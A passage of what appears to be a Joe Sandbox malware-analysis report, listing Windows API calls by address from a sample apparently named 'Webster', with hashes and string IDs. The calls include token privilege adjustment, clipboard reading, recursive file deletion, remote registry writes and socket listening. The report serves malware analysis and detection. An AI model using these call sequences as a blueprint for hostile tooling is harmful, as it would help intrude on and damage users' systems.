                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00B0D6D4
                                                                                  • SendMessageW.USER32 ref: 00B0D703
                                                                                  • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00B0D724
                                                                                  • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00B0D733
                                                                                  • GetCursorPos.USER32(?), ref: 00B0D753
                                                                                  • ScreenToClient.USER32(?,?), ref: 00B0D760
                                                                                  • GetParent.USER32(?), ref: 00B0D780
                                                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 00B0D7E9
                                                                                  • SendMessageW.USER32 ref: 00B0D81A
                                                                                  • ClientToScreen.USER32(?,?), ref: 00B0D878
                                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00B0D8A8
                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00B0D8D2
                                                                                  • SendMessageW.USER32 ref: 00B0D8F5
                                                                                  • ClientToScreen.USER32(?,?), ref: 00B0D947
                                                                                  • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00B0D97B
                                                                                    • Part of subcall function 00A829AB: GetWindowLongW.USER32(?,000000EB), ref: 00A829BC
                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00B0DA17
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                  • String ID: @GUI_DRAGID$F
                                                                                  • API String ID: 3977979337-4164748364
                                                                                  APIs
                                                                                    • Part of subcall function 00AD9399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AD93E3
                                                                                    • Part of subcall function 00AD9399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AD9410
                                                                                    • Part of subcall function 00AD9399: GetLastError.KERNEL32 ref: 00AD941D
                                                                                  • _memset.LIBCMT ref: 00AD8F71
                                                                                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00AD8FC3
                                                                                  • CloseHandle.KERNEL32(?), ref: 00AD8FD4
                                                                                  • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00AD8FEB
                                                                                  • GetProcessWindowStation.USER32 ref: 00AD9004
                                                                                  • SetProcessWindowStation.USER32(00000000), ref: 00AD900E
                                                                                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00AD9028
                                                                                    • Part of subcall function 00AD8DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00AD8F27), ref: 00AD8DFE
                                                                                    • Part of subcall function 00AD8DE9: CloseHandle.KERNEL32(?,?,00AD8F27), ref: 00AD8E10
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                  • String ID: $default$winsta0
                                                                                  • API String ID: 2063423040-1027155976
                                                                                  APIs
                                                                                  • OpenClipboard.USER32(00B10980), ref: 00AF465C
                                                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 00AF466A
                                                                                  • GetClipboardData.USER32(0000000D), ref: 00AF4672
                                                                                  • CloseClipboard.USER32 ref: 00AF467E
                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00AF469A
                                                                                  • CloseClipboard.USER32 ref: 00AF46A4
                                                                                  • GlobalUnlock.KERNEL32(00000000,00000000), ref: 00AF46B9
                                                                                  • IsClipboardFormatAvailable.USER32(00000001), ref: 00AF46C6
                                                                                  • GetClipboardData.USER32(00000001), ref: 00AF46CE
                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00AF46DB
                                                                                  • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00AF470F
                                                                                  • CloseClipboard.USER32 ref: 00AF481F
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                  • String ID:
                                                                                  • API String ID: 3222323430-0
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00AECDD0
                                                                                  • FindClose.KERNEL32(00000000), ref: 00AECE24
                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00AECE49
                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00AECE60
                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00AECE87
                                                                                  • __swprintf.LIBCMT ref: 00AECED3
                                                                                  • __swprintf.LIBCMT ref: 00AECF16
                                                                                    • Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77
                                                                                  • __swprintf.LIBCMT ref: 00AECF6A
                                                                                    • Part of subcall function 00AA38C8: __woutput_l.LIBCMT ref: 00AA3921
                                                                                  • __swprintf.LIBCMT ref: 00AECFB8
                                                                                    • Part of subcall function 00AA38C8: __flsbuf.LIBCMT ref: 00AA3943
                                                                                    • Part of subcall function 00AA38C8: __flsbuf.LIBCMT ref: 00AA395B
                                                                                  • __swprintf.LIBCMT ref: 00AED007
                                                                                  • __swprintf.LIBCMT ref: 00AED056
                                                                                  • __swprintf.LIBCMT ref: 00AED0A5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                                  • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                  • API String ID: 3953360268-2428617273
                                                                                  • Opcode ID: 8feff4e4b0864d83ccfc3bbc1b4662c35e6165357becff36366cbe621d03e7ab
                                                                                  • Instruction ID: 79766f632569b2411f109f9ee61d622aef513cc15efba6ce5729100eb7763db3
                                                                                  • Opcode Fuzzy Hash: 8feff4e4b0864d83ccfc3bbc1b4662c35e6165357becff36366cbe621d03e7ab
                                                                                  • Instruction Fuzzy Hash: D5A13CB2508345ABC714FFA4CA85DAFB7ECEF98704F400919F58587191EB74EA09CB62
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00AEF5F9
                                                                                  • _wcscmp.LIBCMT ref: 00AEF60E
                                                                                  • _wcscmp.LIBCMT ref: 00AEF625
                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 00AEF637
                                                                                  • SetFileAttributesW.KERNEL32(?,?), ref: 00AEF651
                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00AEF669
                                                                                  • FindClose.KERNEL32(00000000), ref: 00AEF674
                                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00AEF690
                                                                                  • _wcscmp.LIBCMT ref: 00AEF6B7
                                                                                  • _wcscmp.LIBCMT ref: 00AEF6CE
                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00AEF6E0
                                                                                  • SetCurrentDirectoryW.KERNEL32(00B3B578), ref: 00AEF6FE
                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00AEF708
                                                                                  • FindClose.KERNEL32(00000000), ref: 00AEF715
                                                                                  • FindClose.KERNEL32(00000000), ref: 00AEF727
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                  • String ID: *.*
                                                                                  • API String ID: 1803514871-438819550
                                                                                  • Opcode ID: b4358540e0764c84b2dd5db9b8964d684c1dff5aa65e52d687f9203fb6a67350
                                                                                  • Instruction ID: a39a12f7ac5934ebdc4dfff1d67ca53316b53c79780bd0e3c3040b29936ea73e
                                                                                  • Opcode Fuzzy Hash: b4358540e0764c84b2dd5db9b8964d684c1dff5aa65e52d687f9203fb6a67350
                                                                                  • Instruction Fuzzy Hash: 3B31B372641259AFDF10EFB5AC59AEE77ACDF09321F5041A5F804E30A0EF74DA84CA60
                                                                                  APIs
                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B00FB3
                                                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,00B10980,00000000,?,00000000,?,?), ref: 00B01021
                                                                                  • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00B01069
                                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00B010F2
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00B01412
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00B0141F
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: Close$ConnectCreateRegistryValue
                                                                                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                  • API String ID: 536824911-966354055
                                                                                  • Opcode ID: 3b89ef6fc2d48df026c0e4629326d7b11492223d5da960e9e716c6756ea5599c
                                                                                  • Instruction ID: 0157368f75a130f5ace867b07d64a6f91a6bc837548b540a12e1c8be55ecf997
                                                                                  • Opcode Fuzzy Hash: 3b89ef6fc2d48df026c0e4629326d7b11492223d5da960e9e716c6756ea5599c
                                                                                  • Instruction Fuzzy Hash: 4B028F752046029FCB14EF29C981E2ABBE5FF89714F04895DF85A9B3A1DB30EC41CB91
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00AEF756
                                                                                  • _wcscmp.LIBCMT ref: 00AEF76B
                                                                                  • _wcscmp.LIBCMT ref: 00AEF782
                                                                                    • Part of subcall function 00AE4875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00AE4890
                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00AEF7B1
                                                                                  • FindClose.KERNEL32(00000000), ref: 00AEF7BC
                                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00AEF7D8
                                                                                  • _wcscmp.LIBCMT ref: 00AEF7FF
                                                                                  • _wcscmp.LIBCMT ref: 00AEF816
                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00AEF828
                                                                                  • SetCurrentDirectoryW.KERNEL32(00B3B578), ref: 00AEF846
                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00AEF850
                                                                                  • FindClose.KERNEL32(00000000), ref: 00AEF85D
                                                                                  • FindClose.KERNEL32(00000000), ref: 00AEF86F
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                  • String ID: *.*
                                                                                  • API String ID: 1824444939-438819550
                                                                                  • Opcode ID: 938830d2de86aa94d26c41d3358c0904bc163287b0ce217d438118f98a4fcc12
                                                                                  • Instruction ID: 1d1e2cd1fdc405e9680cf9be35be3d0411c235c3c9c078cbb28b14674084f31b
                                                                                  • Opcode Fuzzy Hash: 938830d2de86aa94d26c41d3358c0904bc163287b0ce217d438118f98a4fcc12
                                                                                  • Instruction Fuzzy Hash: 0531927250025AAEDB10AFB6DC59AEE77ACDF09321F1041A5F904A31A0DB70DE858A60
                                                                                  APIs
                                                                                    • Part of subcall function 00AD8E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00AD8E3C
                                                                                    • Part of subcall function 00AD8E20: GetLastError.KERNEL32(?,00AD8900,?,?,?), ref: 00AD8E46
                                                                                    • Part of subcall function 00AD8E20: GetProcessHeap.KERNEL32(00000008,?,?,00AD8900,?,?,?), ref: 00AD8E55
                                                                                    • Part of subcall function 00AD8E20: HeapAlloc.KERNEL32(00000000,?,00AD8900,?,?,?), ref: 00AD8E5C
                                                                                    • Part of subcall function 00AD8E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00AD8E73
                                                                                    • Part of subcall function 00AD8EBD: GetProcessHeap.KERNEL32(00000008,00AD8916,00000000,00000000,?,00AD8916,?), ref: 00AD8EC9
                                                                                    • Part of subcall function 00AD8EBD: HeapAlloc.KERNEL32(00000000,?,00AD8916,?), ref: 00AD8ED0
                                                                                    • Part of subcall function 00AD8EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00AD8916,?), ref: 00AD8EE1
                                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00AD8931
                                                                                  • _memset.LIBCMT ref: 00AD8946
                                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00AD8965
                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00AD8976
                                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 00AD89B3
                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00AD89CF
                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00AD89EC
                                                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00AD89FB
                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00AD8A02
                                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00AD8A23
                                                                                  • CopySid.ADVAPI32(00000000), ref: 00AD8A2A
                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00AD8A5B
                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00AD8A81
                                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00AD8A95
                                                                                  Similarity
                                                                                  • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                  • String ID:
                                                                                  • API String ID: 3996160137-0
                                                                                  • Opcode ID: 49c0694cd70fc63c43d7ae606d0a1bd1e05cf2b171b70c62e14e70b4723fb4cb
                                                                                  • Instruction ID: 2372a81eda0b28e439d7e74801b2922c0008dea72dbe742bff2e16c150dfe883
                                                                                  • Opcode Fuzzy Hash: 49c0694cd70fc63c43d7ae606d0a1bd1e05cf2b171b70c62e14e70b4723fb4cb
                                                                                  • Instruction Fuzzy Hash: 82612875910209BFDF00DFA5DC45AEEBB79FF04300F04812AF956A72A0DB799A55CB60
                                                                                  APIs
                                                                                    • Part of subcall function 00B0147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B0040D,?,?), ref: 00B01491
                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B00B0C
                                                                                    • Part of subcall function 00A84D37: __itow.LIBCMT ref: 00A84D62
                                                                                    • Part of subcall function 00A84D37: __swprintf.LIBCMT ref: 00A84DAC
                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00B00BAB
                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00B00C43
                                                                                  • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00B00E82
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00B00E8F
                                                                                  Similarity
                                                                                  • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                  • String ID:
                                                                                  • API String ID: 1240663315-0
                                                                                  • Opcode ID: dbd46de602358cf2d8f662fb6c2603c503098b74e809e0cf19f2b200b4e246dd
                                                                                  • Instruction ID: 7e7a856659c8892f4cba781e5e0f6aada2f414666fe5f16b8cd0a4e066d67e81
                                                                                  • Opcode Fuzzy Hash: dbd46de602358cf2d8f662fb6c2603c503098b74e809e0cf19f2b200b4e246dd
                                                                                  • Instruction Fuzzy Hash: 8BE17F31614205AFCB14EF28C995E6ABBE5FF89714F0489ADF44ADB2A1DB30ED01CB51
                                                                                  APIs
                                                                                  • __swprintf.LIBCMT ref: 00AE4451
                                                                                  • __swprintf.LIBCMT ref: 00AE445E
                                                                                    • Part of subcall function 00AA38C8: __woutput_l.LIBCMT ref: 00AA3921
                                                                                  • FindResourceW.KERNEL32(?,?,0000000E), ref: 00AE4488
                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 00AE4494
                                                                                  • LockResource.KERNEL32(00000000), ref: 00AE44A1
                                                                                  • FindResourceW.KERNEL32(?,?,00000003), ref: 00AE44C1
                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 00AE44D3
                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 00AE44E2
                                                                                  • LockResource.KERNEL32(?), ref: 00AE44EE
                                                                                  • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00AE454F
                                                                                  Similarity
                                                                                  • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                  • String ID:
                                                                                  • API String ID: 1433390588-0
                                                                                  • Opcode ID: a24556327d73be4477278b4193869d4fbe4d96dc7ae94caf3ec69ed5a12f768e
                                                                                  • Instruction ID: 761d1cc266ef443a0f8968b0df8572d94229c193405c197b5a60da1e31650683
                                                                                  • Opcode Fuzzy Hash: a24556327d73be4477278b4193869d4fbe4d96dc7ae94caf3ec69ed5a12f768e
                                                                                  • Instruction Fuzzy Hash: F1318E7160125AABDB11AF61ED48ABF7BACFB09301F408425F912D7150DB74DE50CAB0
                                                                                  APIs
                                                                                  Similarity
                                                                                  • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                  • String ID:
                                                                                  • API String ID: 1737998785-0
                                                                                  • Opcode ID: 9ce11b021aed973167225765d66e3c187d4791bb403ab847335e2a05e9c45345
                                                                                  • Instruction ID: 9a2f9202f1e4fd1cc3b6bc1d1b5b30341c34903aaceb58f99cbb3ac6f7ea3817
                                                                                  • Opcode Fuzzy Hash: 9ce11b021aed973167225765d66e3c187d4791bb403ab847335e2a05e9c45345
                                                                                  • Instruction Fuzzy Hash: 0E21A1312052159FDB01BF64ED49B6E77A8EF88721F008019FA069B2A1DFB0AD50CB94
                                                                                  APIs
                                                                                    • Part of subcall function 00AA0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A92A58,?,00008000), ref: 00AA02A4
                                                                                    • Part of subcall function 00AE4FEC: GetFileAttributesW.KERNEL32(?,00AE3BFE), ref: 00AE4FED
                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00AE3D96
                                                                                  • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00AE3E3E
                                                                                  • MoveFileW.KERNEL32(?,?), ref: 00AE3E51
                                                                                  • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00AE3E6E
                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00AE3E90
                                                                                  • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00AE3EAC
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                                  • String ID: \*.*
                                                                                  • API String ID: 4002782344-1173974218
                                                                                  • Opcode ID: 2820d31bf6d182582c4186fe0210119c506c70d5d6e488688fecd6fb842ddf7a
                                                                                  • Instruction ID: a28d5492202e2e9f3c7797d07a58f4a66356aba9d15a2f9e6ca369363041c33b
                                                                                  • Opcode Fuzzy Hash: 2820d31bf6d182582c4186fe0210119c506c70d5d6e488688fecd6fb842ddf7a
                                                                                  • Instruction Fuzzy Hash: 0E516F3290118EAACF15FBA1CA969EDB7B9AF15300F604165E442B7192EF316F09CB60
                                                                                  APIs
                                                                                    • Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77
                                                                                  • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00AEFA83
                                                                                  • FindClose.KERNEL32(00000000), ref: 00AEFB96
                                                                                    • Part of subcall function 00A852B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A852E6
                                                                                  • Sleep.KERNEL32(0000000A), ref: 00AEFAB3
                                                                                  • _wcscmp.LIBCMT ref: 00AEFAC7
                                                                                  • _wcscmp.LIBCMT ref: 00AEFAE2
                                                                                  • FindNextFileW.KERNEL32(?,?), ref: 00AEFB80
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
                                                                                  • String ID: *.*
                                                                                  • API String ID: 2185952417-438819550
                                                                                  • Opcode ID: 404026fd22709555525fd043264d74c6c1dc47464f628504031e88d13b674193
                                                                                  • Instruction ID: 551ae5fe0c37e6d61b01301717388f15272f09623a767e4e8430fa692ee6025e
                                                                                  • Opcode Fuzzy Hash: 404026fd22709555525fd043264d74c6c1dc47464f628504031e88d13b674193
                                                                                  • Instruction Fuzzy Hash: 0341817194025AAFCF14DF65CD59AEEBBB8FF05350F548166F814A32A1EB309E84CB90
                                                                                  APIs
                                                                                    • Part of subcall function 00AD9399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AD93E3
                                                                                    • Part of subcall function 00AD9399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AD9410
                                                                                    • Part of subcall function 00AD9399: GetLastError.KERNEL32 ref: 00AD941D
                                                                                  • ExitWindowsEx.USER32(?,00000000), ref: 00AE57B4
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                  • String ID: $@$SeShutdownPrivilege
                                                                                  • API String ID: 2234035333-194228
                                                                                  • Opcode ID: e721262ad05997935b8691677d104cd68df0dd9c3aa12ff0c8e4f795375d2182
                                                                                  • Instruction ID: e3152a27dd9a5abf8797c7b2302ad7412285eed8a2e443c51ae6b479b77e3375
                                                                                  • Opcode Fuzzy Hash: e721262ad05997935b8691677d104cd68df0dd9c3aa12ff0c8e4f795375d2182
                                                                                  • Instruction Fuzzy Hash: BF01F731E50756EAE7286377BC8ABBB7268AB05748F24082AF953D70D2DE505C608150
                                                                                  APIs
                                                                                  • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00AF69C7
                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00AF69D6
                                                                                  • bind.WSOCK32(00000000,?,00000010), ref: 00AF69F2
                                                                                  • listen.WSOCK32(00000000,00000005), ref: 00AF6A01
                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00AF6A1B
                                                                                  • closesocket.WSOCK32(00000000,00000000), ref: 00AF6A2F
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                  • String ID:
                                                                                  • API String ID: 1279440585-0
                                                                                  • Opcode ID: c3e5313ecd021c791df899781dedd168576626e5260461eac3cfe54dc5697ca1
                                                                                  • Instruction ID: 11ff48fb67b9397f4254dacc3b628392fa9af721353e0d11add09defde0549cf
                                                                                  • Opcode Fuzzy Hash: c3e5313ecd021c791df899781dedd168576626e5260461eac3cfe54dc5697ca1
                                                                                  • Instruction Fuzzy Hash: B8219E306006059FCB10FFA8C989A7EB7B9EF48724F148659F956A73E1DB70AC41CB91
                                                                                  APIs
                                                                                    • Part of subcall function 00A829E2: GetWindowLongW.USER32(?,000000EB), ref: 00A829F3
                                                                                  • DefDlgProcW.USER32(?,?,?,?,?), ref: 00A81DD6
                                                                                  • GetSysColor.USER32(0000000F), ref: 00A81E2A
                                                                                  • SetBkColor.GDI32(?,00000000), ref: 00A81E3D
                                                                                    • Part of subcall function 00A8166C: DefDlgProcW.USER32(?,00000020,?), ref: 00A816B4
                                                                                  Similarity
                                                                                  • API ID: ColorProc$LongWindow
                                                                                  • String ID:
                                                                                  • API String ID: 3744519093-0
                                                                                  • Opcode ID: 22b794f2e1eefbe508c1aa68618d2d0775d66d84d1597adc1d6fd11e355b86f9
                                                                                  • Instruction ID: 9a6ca7a4f13cab923abbe56785d79b75f8f97104a88b6e336fca80e322c46f42
                                                                                  • Opcode Fuzzy Hash: 22b794f2e1eefbe508c1aa68618d2d0775d66d84d1597adc1d6fd11e355b86f9
                                                                                  • Instruction Fuzzy Hash: ACA123B4125404BBE628BBA98C49FBF3EADEB46341F24460AF402D61D2DF659D03D376
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00AEC329
                                                                                  • _wcscmp.LIBCMT ref: 00AEC359
                                                                                  • _wcscmp.LIBCMT ref: 00AEC36E
                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00AEC37F
                                                                                  • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00AEC3AF
                                                                                  Similarity
                                                                                  • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                  • String ID:
                                                                                  • API String ID: 2387731787-0
                                                                                  • Opcode ID: 4f4dfc4d2009b60670e5dcd834cf2343f4de23f6b3a5169f49f7764c47faff25
                                                                                  • Instruction ID: b3b13407ad4320c9cd50a7ad8277f858afd22e43ae8001c2875ecf6b146b41a9
                                                                                  • Opcode Fuzzy Hash: 4f4dfc4d2009b60670e5dcd834cf2343f4de23f6b3a5169f49f7764c47faff25
                                                                                  • Instruction Fuzzy Hash: E8519A756046029FC714EF69C591EAAB3E8FF49320F10861DF95A8B3A1DB30ED05CB91
                                                                                  APIs
                                                                                    • Part of subcall function 00AF8475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00AF84A0
                                                                                  • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00AF6E89
                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00AF6EB2
                                                                                  • bind.WSOCK32(00000000,?,00000010), ref: 00AF6EEB
                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00AF6EF8
                                                                                  • closesocket.WSOCK32(00000000,00000000), ref: 00AF6F0C
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                                  • String ID:
                                                                                  • API String ID: 99427753-0
                                                                                  • Opcode ID: 3ca34e94f80d7f34fe6edfd3b67a20549c813f4ef1832b25cbc49a9bdad41e35
                                                                                  • Instruction ID: e830fbe02662b6b2b9a80afc3f8fa3223b542ebce2ecd5dbe5ff19fd629fb052
                                                                                  • Opcode Fuzzy Hash: 3ca34e94f80d7f34fe6edfd3b67a20549c813f4ef1832b25cbc49a9bdad41e35
                                                                                  • Instruction Fuzzy Hash: 1541D375600215AFDB10BFA4DD86F7E77A8DF48724F048558FA16AB3D2EA709D008BA1
                                                                                  APIs
                                                                                  Similarity
                                                                                  • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                  • String ID:
                                                                                  • API String ID: 292994002-0
                                                                                  • Opcode ID: f87efcbf1854d9092afee6e66a56b51b5d5da2629fe22c7af7e85a8605a741b5
